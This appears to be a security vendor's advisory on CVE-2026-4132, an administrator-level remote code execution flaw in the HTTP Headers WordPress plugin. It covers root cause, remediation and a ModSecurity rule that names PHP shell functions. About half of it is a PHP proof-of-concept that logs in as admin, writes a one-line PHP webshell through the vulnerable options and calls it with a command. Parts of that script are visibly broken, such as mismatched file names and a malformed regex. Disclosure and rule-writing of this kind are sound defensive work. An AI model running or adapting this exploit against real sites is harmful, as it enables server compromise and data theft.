Atomic Edge analysis of CVE-2026-4132 (metadata-based): This vulnerability affects the HTTP Headers plugin for WordPress versions up to and including 1.19.2. It allows authenticated attackers with Administrator-level access to achieve Remote Code Execution by controlling the file path for an htpasswd file and injecting unsanitized content into that file. The CVSS score is 7.2 (High), with the vector indicating network-based attacks, low complexity, required administrator privileges, no user interaction, and impacts on confidentiality, integrity, and availability all rated as High.
The root cause is a combination of two flaws. First, the plugin stores the file path in the ‘hh_htpasswd_path’ option without sufficient validation, allowing an administrator to set an arbitrary path on the filesystem (CWE-73: External Control of File Name or Path). Second, the ‘hh_www_authenticate_user’ option, which supplies the username for HTTP Basic Authentication, is not sanitized before being written into the file. The apache_auth_credentials() function constructs the file content using sprintf(‘%s:{SHA}%s’, $user, …) and update_auth_credentials() writes this via file_put_contents(). These conclusions are inferred from the vulnerability description and CWE classification, as no source code diff is available.
To exploit this, an attacker with Administrator credentials sends a POST request to the WordPress admin area (likely via the options or settings page for the plugin, or an AJAX handler) updating the ‘hh_htpasswd_path’ option to a path like /path/to/wordpress/wp-content/plugins/http-headers/evil.php and the ‘hh_www_authenticate_user’ option to a payload such as . The plugin then writes the unsanitized user value into the specified file, creating a PHP webshell. The attacker can then access the webshell via HTTP GET with arbitrary commands.
Remediation requires the plugin developer to: (1) strictly validate the ‘hh_htpasswd_path’ option to ensure it points to a safe, predetermined directory (e.g., within the WordPress uploads folder) and restrict the file extension to .htpasswd; (2) sanitize the ‘hh_www_authenticate_user’ value to remove any characters that could be interpreted as executable code (e.g., using WordPress’s sanitize_text_field() and avoiding direct use in file writes); (3) avoid using file_put_contents() with user-controlled filenames and content without validation.
If exploited, this vulnerability allows an attacker with Administrator access to execute arbitrary PHP code on the server, potentially leading to full site compromise including data theft, malware injection, user account creation (including admin accounts), and server takeovers. The attack requires Administrator privileges, but it significantly increases the blast radius of a compromised administrator account.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-4132 (metadata-based)
# Block exploitation of file path control and unsanitized input in HTTP Headers plugin
# This rule targets the options.php endpoint where the vulnerable parameters are likely submitted
SecRule REQUEST_URI "@streq /wp-admin/options.php"
"id:20264132,phase:2,deny,status:403,chain,msg:'CVE-2026-4132 - HTTP Headers plugin RCE via hh_htpasswd_path and hh_www_authenticate_user',severity:'CRITICAL',tag:'CVE-2026-4132'"
SecRule ARGS:hh_htpasswd_path "@rx .php$" "chain"
SecRule ARGS:hh_www_authenticate_user "@rx (?i:<?php|eval|system|exec|popen|passthru|shell_exec|assert|base64_decode|die|exit)" "t:urlDecode,t:lowercase"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4132 - HTTP Headers <= 1.19.2 - Authenticated (Administrator+) External Control of File Name or Path to RCE via 'hh_htpasswd_path' and 'hh_www_authenticate_user' Parameters
// Configuration
$target_url = 'http://target-wordpress-site.com'; // Change this to the target WordPress URL
$admin_username = 'admin'; // Replace with WordPress admin username
$admin_password = 'password'; // Replace with WordPress admin password
// Step 1: Authenticate as admin
$login_url = $target_url . '/wp-login.php';
$cookies = '';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'log' => $admin_username,
'pwd' => $admin_password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies_cve20264132.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
// Extract nonce from admin page for updating options (assumes plugin uses standard settings API)
$admin_dashboard = $target_url . '/wp-admin/options-general.php?page=http-headers';
curl_setopt($ch, CURLOPT_URL, $admin_dashboard);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$admin_page = curl_exec($ch);
// Attempt to extract _wpnonce from the settings form (the form may use a different name; this is a common pattern)
preg_match('/<input type="hidden" name="_wpnonce" value="([^"]+)"/>/', $admin_page, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';
// Alternatively, the plugin may use an AJAX action. We try both approaches.
// Approach A: Standard settings update via admin-post or options update
// The plugin likely registers settings with register_setting() and uses a settings field.
// For demonstration, we POST directly to options.php with the vulnerable parameters.
$options_url = $target_url . '/wp-admin/options.php';
// The webshell payload
$payload = '<?php system($_GET["cmd"]); ?>';
// Set the file path to a writable location within the plugin's directory (or a web-accessible path)
$webshell_path = $target_url . '/wp-content/plugins/http-headers/evil-' . uniqid() . '.php';
$local_path = '/var/www/html/wp-content/plugins/http-headers/evil-' . uniqid() . '.php'; // Adapt to target filesystem
curl_setopt($ch, CURLOPT_URL, $options_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'_wpnonce' => $nonce,
'option_page' => 'http-headers',
'hh_htpasswd_path' => $local_path,
'hh_www_authenticate_user' => $payload
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
// Step 3: Verify the webshell was created by accessing it
$webshell_url = dirname($target_url) . '/wp-content/plugins/http-headers/evil-' . end(explode('/', $local_path)) . '?cmd=id';
curl_setopt($ch, CURLOPT_URL, $webshell_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$result = curl_exec($ch);
echo "PoC complete. Attempted to create webshell at: $webshell_pathn";
echo "If successful, the response should contain the output of the 'id' command:n$resultn";
curl_close($ch);
?>
